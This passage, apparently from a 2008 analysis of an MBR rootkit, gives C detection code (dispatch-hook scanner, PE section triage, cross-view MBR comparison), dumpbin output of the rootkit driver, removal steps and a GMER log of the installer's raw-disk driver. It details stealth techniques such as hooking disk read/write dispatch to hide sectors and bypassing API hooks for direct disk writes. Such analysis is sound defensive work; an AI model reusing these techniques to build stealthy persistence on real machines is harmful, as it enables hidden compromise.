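/* \Driver\Disk -> MajorFunction[0..27], copied from the dump above. */
static const uint32_t g_disk_major_function[IRP_MJ_COUNT] = {
    0xf9a92c30u, 0x805025e4u, 0xf9a92c30u, 0x81831410u, 0x81831410u, 0x805025e4u,
    0x805025e4u, 0x805025e4u, 0x805025e4u, 0xf9a8d366u, 0x805025e4u, 0x805025e4u,
    0x805025e4u, 0x805025e4u, 0xf9a8d44du, 0xf9a90fc3u, 0xf9a8d366u, 0x805025e4u,
    0x805025e4u, 0x805025e4u, 0x805025e4u, 0x805025e4u, 0xf9a8eef3u, 0xf9a93a24u,
    0x805025e4u, 0x805025e4u, 0x805025e4u, 0xf9a92d15u,
};

/* Returns the module whose image covers addr, or NULL if none does. */
static const module_range *find_module(const module_range *mods, size_t nmods, uint32_t addr)
{
    for (size_t i = 0; i < nmods; i++)
        if (addr >= mods[i].base && addr - mods[i].base < mods[i].size)
            return &mods[i];
    return NULL;
}

/* Stores the indices of dispatch entries that point outside every module in
 * out[] (at most out_cap of them) and returns the total number found. */
size_t find_hooked_dispatch_entries(const uint32_t *table, size_t n,
                                    const module_range *mods, size_t nmods,
                                    int *out, size_t out_cap)
{
    size_t found = 0;
    for (size_t i = 0; i < n; i++) {
        if (find_module(mods, nmods, table[i]) != NULL)
            continue;                       /* inside a known image: legitimate */
        if (found < out_cap)
            out[found] = (int)i;
        found++;
    }
    return found;
}

int main(void)
{
    int hooked[IRP_MJ_COUNT];
    size_t n = find_hooked_dispatch_entries(g_disk_major_function, IRP_MJ_COUNT,
                                            g_modules, G_MODULES_COUNT,
                                            hooked, IRP_MJ_COUNT);
    /* For the table above this reports entries 0x03 (IRP_MJ_READ) and 0x04 (IRP_MJ_WRITE). */
    for (size_t i = 0; i < n; i++)
        printf("MajorFunction[0x%02x] = 0x%08x lies outside every loaded module\n",
               hooked[i], (unsigned)g_disk_major_function[hooked[i]]);
    return n ? 1 : 0;
}
```

    A live scanner fills the module table from PsLoadedModuleList and takes the dispatch table from the DRIVER_OBJECT it obtains with ObReferenceObjectByName; the range test itself is unchanged. Entries that point into nt (nt!IopInvalidDeviceRequest for unsupported IRPs) or into CLASSPNP are legitimate and are not reported.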
    

    Kernel driver


    The malicious kernel driver is loaded at the last stage of the boot process. The driver, the main part of this rootkit, is responsible for the network communication and for hiding the real content of the affected sectors (sector 0, sectors 60-62 and the driver image written to the last sectors of the disk).

    Microsoft (R) COFF Binary File Dumper Version 6.00.8447
    Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
    
    
    Dump of file mbr.sys
    
    PE signature found
    
    File Type: EXECUTABLE IMAGE
    
    FILE HEADER VALUES
                 14C machine (i386)
                   5 number of sections
            47578F69 time date stamp Thu Dec 06 06:58:01 2007
                   0 file pointer to symbol table
                   0 number of symbols
                  E0 size of optional header
                 10E characteristics
                       Executable
                       Line numbers stripped
                       Symbols stripped
                       32 bit word machine
    
    OPTIONAL HEADER VALUES
                 10B magic #
                7.10 linker version
                9900 size of code
               2F078 size of initialized data
                   0 size of uninitialized data
                9946 RVA of entry point
                 480 base of code
                9A80 base of data
               10000 image base
                  80 section alignment
                  80 file alignment
                5.00 operating system version
                5.00 image version
                5.00 subsystem version
                   0 Win32 version
               3BBF8 size of image
                 480 size of headers
               47EF6 checksum
                   1 subsystem (Native)
                   0 DLL characteristics
               40000 size of stack reserve
                1000 size of stack commit
              100000 size of heap reserve
                1000 size of heap commit
                   0 loader flags
                  10 number of directories
                   0 [       0] RVA [size] of Export Directory
                9C9C [      28] RVA [size] of Import Directory
                   0 [       0] RVA [size] of Resource Directory
                   0 [       0] RVA [size] of Exception Directory
                   0 [       0] RVA [size] of Certificates Directory
                9E80 [    2DFC] RVA [size] of Base Relocation Directory
                   0 [       0] RVA [size] of Debug Directory
                   0 [       0] RVA [size] of Architecture Directory
                   0 [       0] RVA [size] of Special Directory
                   0 [       0] RVA [size] of Thread Storage Directory
                   0 [       0] RVA [size] of Load Configuration Directory
                   0 [       0] RVA [size] of Bound Import Directory
                9A80 [      44] RVA [size] of Import Address Table Directory
                   0 [       0] RVA [size] of Delay Import Directory
                   0 [       0] RVA [size] of Reserved Directory
                   0 [       0] RVA [size] of Reserved Directory
    
    
    SECTION HEADER #1
       .text name
        95BC virtual size
         480 virtual address
        9600 size of raw data
         480 file pointer to raw data
           0 file pointer to relocation table
           0 file pointer to line numbers
           0 number of relocations
           0 number of line numbers
    E8000020 flags
             Code
             Not Paged
             Execute Read Write
    
    SECTION HEADER #2
      .rdata name
          A8 virtual size
        9A80 virtual address
         100 size of raw data
        9A80 file pointer to raw data
           0 file pointer to relocation table
           0 file pointer to line numbers
           0 number of relocations
           0 number of line numbers
    E8000040 flags
             Initialized Data
             Not Paged
             Execute Read Write
    
    SECTION HEADER #3
        INIT name
         2F6 virtual size
        9B80 virtual address
         300 size of raw data
        9B80 file pointer to raw data
           0 file pointer to relocation table
           0 file pointer to line numbers
           0 number of relocations
           0 number of line numbers
    E8000020 flags
             Code
             Not Paged
             Execute Read Write
    
    SECTION HEADER #4
      .reloc name
        2E26 virtual size
        9E80 virtual address
        2E80 size of raw data
        9E80 file pointer to raw data
           0 file pointer to relocation table
           0 file pointer to line numbers
           0 number of relocations
           0 number of line numbers
    E8000040 flags
             Initialized Data
             Not Paged
             Execute Read Write
    
    SECTION HEADER #5
     .attach name
       2EEF8 virtual size
        CD00 virtual address
       2EEF8 size of raw data
        CD00 file pointer to raw data
           0 file pointer to relocation table
           0 file pointer to line numbers
           0 number of relocations
           0 number of line numbers
    E8000040 flags
             Initialized Data
             Not Paged
             Execute Read Write
    
      Summary
    
           2EF00 .attach
             100 .rdata
            2E80 .reloc
            9600 .text
             300 INIT
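    A header-level triage of the driver shown in the dumpbin output, added as an example (not from the original post): parse the IMAGE_SECTION_HEADER table and flag data sections that are both writable and executable, plus section names no compiler emits by default. The five 40-byte headers are constructed from the values dumpbin printed above for mbr.sys; nothing else about the file is assumed. Every data section of the driver, including .rdata and .reloc, carries 0xE8000040 (initialized data, not paged, execute/read/write), and the .attach section, 0x2EEF8 bytes, holds most of the image.

```c
/* Added example: PE section-header triage for a kernel driver. Not code from
 * the original post; the section table is rebuilt from the dumpbin output. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define SECTION_HEADER_SIZE             40          /* sizeof(IMAGE_SECTION_HEADER) */
#define IMAGE_SCN_CNT_INITIALIZED_DATA  0x00000040u
#define IMAGE_SCN_MEM_EXECUTE           0x20000000u
#define IMAGE_SCN_MEM_WRITE             0x80000000u

typedef struct {
    char     name[9];              /* 8 bytes in the file, not necessarily NUL-terminated */
    uint32_t virtual_size, virtual_address, raw_size, raw_offset, characteristics;
} section_info;

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Parses n IMAGE_SECTION_HEADER entries starting at p (the table that follows
 * the optional header: e_lfanew + 4 + 20 + SizeOfOptionalHeader). */
size_t parse_section_headers(const uint8_t *p, size_t n, section_info *out)
{
    for (size_t i = 0; i < n; i++, p += SECTION_HEADER_SIZE) {
        memcpy(out[i].name, p, 8);
        out[i].name[8]         = '\0';
        out[i].virtual_size    = rd32(p + 8);
        out[i].virtual_address = rd32(p + 12);
        out[i].raw_size        = rd32(p + 16);
        out[i].raw_offset      = rd32(p + 20);
        out[i].characteristics = rd32(p + 36);
    }
    return n;
}

/* A data section that is both writable and executable. */
int section_is_wx_data(const section_info *s)
{
    const uint32_t wx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE;
    return (s->characteristics & IMAGE_SCN_CNT_INITIALIZED_DATA) != 0
        && (s->characteristics & wx) == wx;
}

int section_name_is_standard(const section_info *s)
{
    static const char *known[] = { ".text", ".rdata", ".data", ".bss", ".reloc", ".rsrc",
                                   ".edata", ".idata", "INIT", "PAGE" };
    for (size_t i = 0; i < sizeof known / sizeof known[0]; i++)
        if (strcmp(s->name, known[i]) == 0)
            return 1;
    return 0;
}

/* Prints one line per suspicious section and returns how many there were. */
size_t triage_sections(const section_info *s, size_t n)
{
    size_t flagged = 0;
    for (size_t i = 0; i < n; i++) {
        int wx  = section_is_wx_data(&s[i]);
        int odd = !section_name_is_standard(&s[i]);
        if (!wx && !odd)
            continue;
        flagged++;
        printf("%-8s va=%05x raw=%05x chars=%08x:%s%s\n", s[i].name,
               (unsigned)s[i].virtual_address, (unsigned)s[i].raw_size,
               (unsigned)s[i].characteristics,
               wx ? " writable+executable data" : "", odd ? " non-standard name" : "");
    }
    return flagged;
}

static void put_header(uint8_t *p, const char *name, uint32_t vsize, uint32_t vaddr,
                       uint32_t rawsize, uint32_t rawoff, uint32_t chars)
{
    memset(p, 0, SECTION_HEADER_SIZE);
    memcpy(p, name, strlen(name));         /* names used here are at most 8 characters */
    wr32(p + 8, vsize); wr32(p + 12, vaddr); wr32(p + 16, rawsize); wr32(p + 20, rawoff);
    wr32(p + 36, chars);
}

/* Constructed from the dumpbin output for mbr.sys: the five raw section headers. */
size_t build_mbr_sys_section_table(uint8_t *buf)
{
    put_header(buf + 0 * SECTION_HEADER_SIZE, ".text",   0x95BC,  0x0480, 0x9600,  0x0480, 0xE8000020u);
    put_header(buf + 1 * SECTION_HEADER_SIZE, ".rdata",  0x00A8,  0x9A80, 0x0100,  0x9A80, 0xE8000040u);
    put_header(buf + 2 * SECTION_HEADER_SIZE, "INIT",    0x02F6,  0x9B80, 0x0300,  0x9B80, 0xE8000020u);
    put_header(buf + 3 * SECTION_HEADER_SIZE, ".reloc",  0x2E26,  0x9E80, 0x2E80,  0x9E80, 0xE8000040u);
    put_header(buf + 4 * SECTION_HEADER_SIZE, ".attach", 0x2EEF8, 0xCD00, 0x2EEF8, 0xCD00, 0xE8000040u);
    return 5;
}

int main(void)
{
    uint8_t table[5 * SECTION_HEADER_SIZE];
    section_info sections[5];
    size_t n = build_mbr_sys_section_table(table);
    parse_section_headers(table, n, sections);
    size_t flagged = triage_sections(sections, n);   /* .rdata, .reloc and .attach */
    printf("%zu of %zu sections flagged\n", flagged, n);
    return flagged ? 1 : 0;
}
```

    On a real file the same parser is pointed at the section table inside the image (offset e_lfanew + 4 + 20 + SizeOfOptionalHeader, here 0x480 - 5*40 since the headers end at size of headers 0x480); the code sections (.text, INIT) are not flagged because execute/write on code is what the check tolerates, the three data sections are.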
    

    Detection


    Detection can be based on a cross-view comparison of the MBR sector. The userland part of a scanner reads the MBR through the standard Windows API; on an infected machine that request passes through the hooked IRP_MJ_READ and comes back with the fake, clean-looking content:

    HANDLE hFile = CreateFileA( "\\\\.\\PHYSICALDRIVE0", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
    ReadFile( hFile, Buffer, 512, &BytesRead, NULL );   /* Buffer: BYTE[512], BytesRead: DWORD; sector 0 is the MBR */
    CloseHandle( hFile );
    

    The kernel part of the scanner reads the same sector by calling the original dispatch routine directly, \Driver\Disk -> MajorFunction[IRP_MJ_READ] = CLASSPNP!ClassReadWrite, so the hook never sees the request. That address has to come from the CLASSPNP image itself (by resolving the symbol), not from the dispatch table, which is already patched.

    If the two views of the sector are not identical, the machine is infected. The same comparison applies to the other sectors the rootkit hides (60, 61, 62 and the driver image in the last sectors of the disk), but the MBR is the place to start: the rootkit cannot avoid modifying it, because that is where it gets loaded from.
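    The cross-view comparison itself, written out as an added example (not the post's own code). It takes the two 512-byte views described above, the one ReadFile returns through the hooked IRP_MJ_READ and the one obtained in the kernel through the original CLASSPNP!ClassReadWrite, and reports whether they differ and in which part of the MBR layout (boot code, partition table, 0x55AA signature). The Windows reads are left out so the block compiles anywhere; the two sample sectors are constructed here, and the loader bytes in the infected view are stand-ins, not the rootkit's real code. The constructed infected view keeps the partition table and signature intact, as an MBR loader must if the machine is to keep booting.

```c
/* Added example: cross-view comparison of the MBR sector. Not code from the
 * original post; the Windows reads are omitted so it compiles anywhere. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define SECTOR_SIZE    512
#define MBR_TABLE_OFF  446      /* bytes 0..445 bootstrap code, then 4 x 16-byte entries */
#define MBR_SIG_OFF    510      /* 0x55 0xAA */

enum { VIEW_CLEAN = 0, VIEW_CODE_DIFFERS = 1, VIEW_TABLE_DIFFERS = 2, VIEW_SIG_DIFFERS = 4 };

typedef struct {
    unsigned flags;        /* OR of the VIEW_* bits */
    size_t   first_diff;   /* offset of the first differing byte, SECTOR_SIZE if none */
    size_t   diff_bytes;   /* how many bytes differ */
} mbr_diff;

int mbr_signature_ok(const uint8_t *s)
{
    return s[MBR_SIG_OFF] == 0x55 && s[MBR_SIG_OFF + 1] == 0xAA;
}

/* Every entry's status byte must be 0x00 or 0x80; anything else means the
 * sector is not a sane MBR at all. */
int mbr_partition_table_ok(const uint8_t *s)
{
    for (int i = 0; i < 4; i++) {
        uint8_t status = s[MBR_TABLE_OFF + 16 * i];
        if (status != 0x00 && status != 0x80)
            return 0;
    }
    return 1;
}

/* api_view: sector 0 as ReadFile on \\.\PHYSICALDRIVE0 returned it (through
 * the hooked IRP_MJ_READ). raw_view: the same sector read in the kernel by
 * calling the original CLASSPNP!ClassReadWrite. Any difference is a hit. */
mbr_diff compare_mbr_views(const uint8_t *api_view, const uint8_t *raw_view)
{
    mbr_diff d = { VIEW_CLEAN, SECTOR_SIZE, 0 };
    for (size_t i = 0; i < SECTOR_SIZE; i++) {
        if (api_view[i] == raw_view[i])
            continue;
        if (d.first_diff == SECTOR_SIZE)
            d.first_diff = i;
        d.diff_bytes++;
        if (i < MBR_TABLE_OFF)      d.flags |= VIEW_CODE_DIFFERS;
        else if (i < MBR_SIG_OFF)   d.flags |= VIEW_TABLE_DIFFERS;
        else                        d.flags |= VIEW_SIG_DIFFERS;
    }
    return d;
}

/* Constructed sample: a clean MBR with one active NTFS partition starting at
 * LBA 63. The boot bytes are a generic stub, not any real loader. */
void build_clean_mbr(uint8_t *s)
{
    static const uint8_t stub[] = { 0x33, 0xC0, 0x8E, 0xD0, 0xBC, 0x00, 0x7C }; /* xor ax,ax; mov ss,ax; mov sp,7C00h */
    memset(s, 0, SECTOR_SIZE);
    memcpy(s, stub, sizeof stub);
    uint8_t *e = s + MBR_TABLE_OFF;
    e[0] = 0x80;                              /* bootable */
    e[4] = 0x07;                              /* NTFS */
    e[8] = 63;                                /* starting LBA (little-endian) */
    e[12] = 0xFF; e[13] = 0xFF; e[14] = 0x3F; /* 0x3FFFFF sectors */
    s[MBR_SIG_OFF] = 0x55;
    s[MBR_SIG_OFF + 1] = 0xAA;
}

/* Constructed sample of what the raw read returns on an infected disk: the
 * bootstrap code is replaced (stand-in bytes, not the rootkit's loader) while
 * the partition table and signature are kept, so the machine still boots. */
void build_raw_infected_view(uint8_t *s, const uint8_t *clean)
{
    static const uint8_t loader_stub[] = { 0xFA, 0x33, 0xC0, 0x8E, 0xD8, 0xBE, 0x00, 0x7C }; /* cli; xor ax,ax; mov ds,ax; mov si,7C00h */
    memcpy(s, clean, SECTOR_SIZE);
    memcpy(s, loader_stub, sizeof loader_stub);
}

int main(void)
{
    uint8_t api_view[SECTOR_SIZE], raw_view[SECTOR_SIZE];
    build_clean_mbr(api_view);                 /* the hook hands back the clean copy */
    build_raw_infected_view(raw_view, api_view);

    mbr_diff d = compare_mbr_views(api_view, raw_view);
    if (d.flags == VIEW_CLEAN) {
        puts("MBR views identical: no sector hider active");
        return 0;
    }
    printf("MBR views differ: %zu byte(s) from offset %zu;%s%s%s\n", d.diff_bytes, d.first_diff,
           (d.flags & VIEW_CODE_DIFFERS)  ? " boot code" : "",
           (d.flags & VIEW_TABLE_DIFFERS) ? " partition table" : "",
           (d.flags & VIEW_SIG_DIFFERS)   ? " signature" : "");
    printf("raw view still a valid MBR: %s\n",
           mbr_signature_ok(raw_view) && mbr_partition_table_ok(raw_view) ? "yes" : "no");
    return 1;
}
```

    The region classification is what makes the result actionable: a difference confined to the boot code with an intact partition table is the signature of a loader that wants the system to keep booting, whereas a differing partition table or signature points at something else (a damaged sector, or a tool that rewrote the MBR wholesale). Comparing the raw view of sector 0 against the copy the rootkit keeps in sector 62 is the same routine with a different second buffer.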


    Rootkit removal


    To remove the rootkit from an infected machine, boot the Recovery Console from the Windows installation media and run the fixmbr command. It rewrites the boot code in sector 0 and keeps the partition table, which is enough: the loader in sector 61 and the driver image in the last sectors of the disk remain on the disk but are never executed again, because nothing references them once the MBR is clean. Booting from the installation media matters, since the sector hider is only active while the rootkit's driver is loaded and would otherwise feed the clean copy back to any tool that inspects sector 0.

    References

    [1] Derek Soeder, Ryan Permeh: eEye BootRoot, 2005. http://research.eeye.com/html/tools/RT20060801-7.html

    [2] Symantec AntiVirus Research Center: Understanding Virus Behavior under Windows NT. http://www.symantec.com/avcenter/reference/virus.behavior.under.win.nt.pdf

    [3] Joanna Rutkowska: Pagefile attack, 2006. http://theinvisiblethings.blogspot.com/2006_10_01_archive.html

    [4] Mark Russinovich, Bryce Cogswell: Process Monitor. http://www.microsoft.com/technet/sysinternals/processesandthreads/processmonitor.mspx

    [5] Nitin Kumar, Vipin Kumar: Vbootkit: Compromising Windows Vista Security, 2007. http://www.blackhat.com/presentations/bh-europe-07/Kumar/Presentation/bh-eu-07-kumar-apr19.pdf




    Update - mat25.exe

    Feb 10th, 2008

    A month later, the author of the rootkit released an improved version of the malware. The main part of the rootkit is almost identical to the previous one; the changes concern the installer.

    
    Dump of file mbr2.sys
    
    PE signature found
    
    File Type: EXECUTABLE IMAGE
    
    FILE HEADER VALUES
                 14C machine (i386)
                   5 number of sections
            47AA1720 time date stamp Wed Feb 06 21:22:56 2008
                   0 file pointer to symbol table
                   0 number of symbols
                  E0 size of optional header
                 10E characteristics
                       Executable
                       Line numbers stripped
                       Symbols stripped
                       32 bit word machine
    
    OPTIONAL HEADER VALUES
                 10B magic #
                7.10 linker version
                6C00 size of code
               2FB60 size of initialized data
                   0 size of uninitialized data
                6C18 RVA of entry point
                 480 base of code
                6D80 base of data
               10000 image base
                  80 section alignment
                  80 file alignment
                5.00 operating system version
                5.00 image version
                5.00 subsystem version
                   0 Win32 version
               38AE0 size of image
                 480 size of headers
               408B1 checksum
                   1 subsystem (Native)
                   0 DLL characteristics
               40000 size of stack reserve
                1000 size of stack commit
              100000 size of heap reserve
                1000 size of heap commit
                   0 loader flags
                  10 number of directories
    

    Improved installer


    The previous version of the installer modified disk sectors through the standard Windows API functions. That way of infecting the MBR is easy for security applications to intercept, so the latest version uses a dedicated driver for direct access to disk sectors. The gmer.sys log below shows the sequence: mat25.exe starts 1.tmp, the driver is dropped into system32 under a GUID name, registered as a demand-start kernel service (Type 1, Start 3) and loaded; it tries to open \Device\HardDisk0 through \Device\HardDisk15 (only HardDisk0 exists on the test machine), creates its own \Device\RealHardDisk0 with a \DosDevices\RealHardDisk0 link, and then forwards the 512-byte sector reads it receives from 1.tmp straight to \Driver\Disk with IoBuildSynchronousFsdRequest and IofCallDriver, below the level at which usermode API hooks and file-system filters can see them.

    2008-02-10 14:09:21 gmer.sys cmd.exe [372]: CreateProcessEx c:\rootkits\mat25.exe
    2008-02-10 14:09:25 gmer.sys mat25.exe [692]: CreateProcessEx c:\docume~1\przemek\ustawi~1\temp\1.tmp
    2008-02-10 14:09:25 gmer.sys mat25.exe [692]: CreateProcessEx c:\rootkits\mat25.exe
    2008-02-10 14:10:07 gmer.sys services.exe [552]: CreateProcessEx c:\windows\system32\svchost.exe
    2008-02-10 14:10:16 gmer.sys svchost.exe [1252]: CreateProcessEx c:\windows\temp\3.tmp
    2008-02-10 14:11:21 gmer.sys services.exe [552]: LoadDriver \??\C:\WINDOWS\system32\{FBE1D620-5418-4aae-A0F0-316D590663A1}
    
    Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\{FBE1D620-5418-4aae-A0F0-316D590663A1}]
    "Type"=dword:00000001
    "Start"=dword:00000003
    "ErrorControl"=dword:00000000
    "ImagePath"="\??\C:\WINDOWS\system32\{FBE1D620-5418-4aae-A0F0-316D590663A1}"
    
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2BFB System: nt!KeInitializeSpinLock
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk0" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk0" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C8C System: nt!ObReferenceObjectByHandle( (HANDLE)0x17C [\Device\Harddisk0] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C99 System: nt!ZwClose( (HANDLE)0x17C [\Device\Harddisk0] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2D26 System: nt!ObfDereferenceObject( (OBJECT)0x81A53248 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2D38 System: nt!ExAllocatePoolWithTag( (SIZE_T)24 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2D5F System: nt!ExfInterlockedInsertTailList
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk1" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk1" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk2" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk2" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk3" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk3" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk4" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk4" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk5" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk5" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk6" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk6" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk7" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk7" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk8" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk8" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk9" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk9" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk10" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk10" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk11" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk11" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk12" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk12" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk13" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk13" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk14" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk14" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C34 System: nt!RtlInitUnicodeString( "\Device\HardDisk15" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2C70 System: nt!ObOpenObjectByName( "\Device\HardDisk15" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2DE6 System: nt!RtlInitUnicodeString( "\Device\RealHardDisk0" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2E05 System: nt!IoCreateDevice( "\Device\RealHardDisk0" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD3A1D System: nt!RtlAnsiCharToUnicodeChar
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2E4D System: nt!RtlInitUnicodeString( "\DosDevices\RealHardDisk0" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2E5D System: nt!IoCreateSymbolicLink( "\DosDevices\RealHardDisk0", "\Device\RealHardDisk0" )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_CREATE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_CLOSE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 1.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_CREATE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B66 1.tmp: nt!PsGetCurrentProcessId
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD29E0 1.tmp: nt!KeInitializeEvent
